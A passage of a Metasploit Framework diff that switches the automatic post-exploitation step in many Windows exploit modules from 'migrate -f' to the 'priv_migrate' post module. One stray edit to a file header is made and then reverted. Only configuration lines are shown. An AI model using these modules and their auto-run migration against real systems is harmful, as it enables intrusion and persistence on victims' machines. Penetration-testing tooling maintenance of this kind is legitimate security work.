
--- a/modules/exploits/windows/browser/ms12_004_midi.rb
+++ b/modules/exploits/windows/browser/ms12_004_midi.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'             => "process",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
+++ b/modules/exploits/windows/browser/ms12_037_ie_colspan.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ms12_037_same_id.rb
+++ b/modules/exploits/windows/browser/ms12_037_same_id.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
+++ b/modules/exploits/windows/browser/ms13_009_ie_slayoutrun_uaf.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'	  => 'win',
       'Targets'	  =>

--- a/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
+++ b/modules/exploits/windows/browser/ms13_022_silverlight_script_object.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'EXITFUNC'             => 'thread'
         },
       'Platform'       => 'win',

--- a/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
+++ b/modules/exploits/windows/browser/ms13_037_svg_dashstyle.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Arch'           => ARCH_X86,

--- a/modules/exploits/windows/browser/ms13_055_canchor.rb
+++ b/modules/exploits/windows/browser/ms13_055_canchor.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       # Bug was patched in July 2013. Tsai was the first to publish the bug.

--- a/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
+++ b/modules/exploits/windows/browser/ms13_059_cflatmarkuppointer.rb
@@ -75,7 +75,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "Jun 27 2013",

--- a/modules/exploits/windows/browser/ms13_069_caret.rb
+++ b/modules/exploits/windows/browser/ms13_069_caret.rb
@@ -72,7 +72,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "Sep 10 2013",

--- a/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
+++ b/modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb
@@ -76,7 +76,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           #'PrependMigrate'       => true,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       # Jsunpack first received a sample to analyze on Sep 12 2013.

--- a/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
+++ b/modules/exploits/windows/browser/ms13_090_cardspacesigninhelper.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Privileged'     => false,

--- a/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
+++ b/modules/exploits/windows/browser/ms14_012_cmarkup_uaf.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'Retries'              => false
         },
       'Targets'        =>

--- a/modules/exploits/windows/browser/ms14_012_textrange.rb
+++ b/modules/exploits/windows/browser/ms14_012_textrange.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'Retries'              => false, # You're too kind, tab recovery, I only need 1 shell.
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'DisclosureDate' => "Mar 11 2014", # Vuln was found in 2013. Mar 11 = Patch tuesday
       'DefaultTarget'  => 0))

--- a/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
+++ b/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
+++ b/modules/exploits/windows/browser/novell_groupwise_gwcls1_actvx.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ntr_activex_check_bof.rb
+++ b/modules/exploits/windows/browser/ntr_activex_check_bof.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
+++ b/modules/exploits/windows/browser/ntr_activex_stopmodule.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
+++ b/modules/exploits/windows/browser/oracle_autovue_setmarkupmode.rb
@@ -56,7 +56,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
+++ b/modules/exploits/windows/browser/oracle_webcenter_checkoutandopen.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f -k'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ovftool_format_string.rb
+++ b/modules/exploits/windows/browser/ovftool_format_string.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/pcvue_func.rb
+++ b/modules/exploits/windows/browser/pcvue_func.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/quickr_qp2_bof.rb
+++ b/modules/exploits/windows/browser/quickr_qp2_bof.rb
@@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/realplayer_qcp.rb
+++ b/modules/exploits/windows/browser/realplayer_qcp.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform' => 'win',
       'Targets'  =>

--- a/modules/exploits/windows/browser/safari_xslt_output.rb
+++ b/modules/exploits/windows/browser/safari_xslt_output.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'         =>
         {

--- a/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
+++ b/modules/exploits/windows/browser/samsung_neti_wiewer_backuptoavi_bof.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
+++ b/modules/exploits/windows/browser/siemens_solid_edge_selistctrlx.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
+++ b/modules/exploits/windows/browser/synactis_connecttosynactis_bof.rb
@@ -74,7 +74,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Privileged'     => false,
       'DisclosureDate' => "May 30 2013",

--- a/modules/exploits/windows/browser/teechart_pro.rb
+++ b/modules/exploits/windows/browser/teechart_pro.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
+++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb
@@ -61,7 +61,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
+++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb
@@ -41,7 +41,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'EXITFUNC' => 'process',
           'DisablePayloadHandler' => false,
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/vlc_amv.rb
+++ b/modules/exploits/windows/browser/vlc_amv.rb
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>

--- a/modules/exploits/windows/browser/vlc_mms_bof.rb
+++ b/modules/exploits/windows/browser/vlc_mms_bof.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "process",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>

--- a/modules/exploits/windows/browser/webex_ucf_newobject.rb
+++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
+++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'BrowserRequirements' =>
         {

--- a/modules/exploits/windows/browser/wmi_admintools.rb
+++ b/modules/exploits/windows/browser/wmi_admintools.rb
@@ -52,7 +52,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
+++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'      =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'            => 'win',
       'Arch'                => ARCH_X86,

--- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
+++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb
@@ -42,7 +42,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
+++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'             => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>

--- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
+++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb
@@ -47,7 +47,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'             => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>

--- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
+++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC'             => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>

--- a/modules/exploits/windows/fileformat/adobe_libtiff.rb
+++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb
@@ -1,4 +1,4 @@
-##
+post/windows/manage/priv_migrate##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
@@ -38,7 +38,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'DisablePayloadHandler' => 'true',
         },
       'Payload'        =>

--- a/modules/exploits/windows/fileformat/adobe_libtiff.rb
+++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb
@@ -1,4 +1,4 @@
-post/windows/manage/priv_migrate##
+##
 # This module requires Metasploit: http://metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

--- a/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
+++ b/modules/exploits/windows/fileformat/cyberlink_p2g_bof.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'         =>
         {

--- a/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
+++ b/modules/exploits/windows/fileformat/esignal_styletemplate_bof.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Payload'        =>

--- a/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
+++ b/modules/exploits/windows/fileformat/irfanview_jpeg2000_bof.rb
@@ -45,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'           =>
         {

--- a/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
+++ b/modules/exploits/windows/fileformat/ms11_006_createsizeddibsection.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'seh',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
+++ b/modules/exploits/windows/fileformat/ms11_021_xlb_bof.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'EXITFUNC'          => "process",
           'DisablePayloadHandler' => 'true',
-          'InitialAutoRunScript'  => 'migrate -f'
+          'InitialAutoRunScript'  => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
+++ b/modules/exploits/windows/fileformat/tfm_mmplayer_m3u_ppl_bof.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/http/cogent_datahub_command.rb
+++ b/modules/exploits/windows/http/cogent_datahub_command.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Stance'      => Msf::Exploit::Stance::Aggressive,
       'DefaultOptions' => {
         'WfsDelay' => 30,
-        'InitialAutoRunScript' => 'migrate -f'
+        'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
       },
       'Targets'     =>
         [

--- a/modules/exploits/windows/http/cyclope_ess_sqli.rb
+++ b/modules/exploits/windows/http/cyclope_ess_sqli.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>

--- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb
+++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb
@@ -34,7 +34,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'  =>

--- a/modules/exploits/windows/http/hp_nnm_ovas.rb
+++ b/modules/exploits/windows/http/hp_nnm_ovas.rb
@@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           'WfsDelay' => 45,
           'EXITFUNC' => 'thread',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload' =>
         {

--- a/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
+++ b/modules/exploits/windows/http/hp_nnm_webappmon_execvp.rb
@@ -57,7 +57,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform' => 'win',
       'Targets'	 =>

--- a/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
+++ b/modules/exploits/windows/http/hp_nnm_webappmon_ovjavalocale.rb
@@ -66,7 +66,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => "seh",
-          "InitialAutoRunScript" => "migrate -f",
+          "InitialAutoRunScript" => "post/windows/manage/priv_migrate",
         },
       'Platform' => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/misc/citrix_streamprocess.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
         {
           # best at delaying/preventing target crashing post-exploit
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb
@@ -35,7 +35,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
+++ b/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/misc/itunes_extm3u_bof.rb
+++ b/modules/exploits/windows/misc/itunes_extm3u_bof.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => ['win'],
       'Arch'           => ARCH_X86,

--- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
+++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
       'DefaultOptions' =>
         {
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
           'EXITFUNC' => 'process'
         },
       'Payload'        =>

--- a/modules/exploits/windows/misc/splayer_content_type.rb
+++ b/modules/exploits/windows/misc/splayer_content_type.rb
@@ -40,7 +40,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/misc/stream_down_bof.rb
+++ b/modules/exploits/windows/misc/stream_down_bof.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'seh',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -64,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'seh',
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
+++ b/modules/exploits/windows/mysql/scrutinizer_upload_exec.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         },
       'DefaultOptions'  =>
         {
-          'InitialAutoRunScript' => 'migrate -f'
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
         },
       'Platform'       => 'win',
       'Targets'        =>

--- a/modules/exploits/windows/scada/daq_factory_bof.rb
+++ b/modules/exploits/windows/scada/daq_factory_bof.rb
@@ -36,7 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions' =>
         {
           'EXITFUNC' => 'process',
-          'InitialAutoRunScript' => 'migrate -f',
+          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
         },
       'Payload'        =>
         {

--- a/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
+++ b/modules/exploits/windows/scada/iconics_webhmi_setactivexguid.rb
@@ -43,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'DefaultOptions'  =>
         {
           'EXITFUNC'         => "seh",
-          'InitialAutoRunScript' => 'migrate -f',
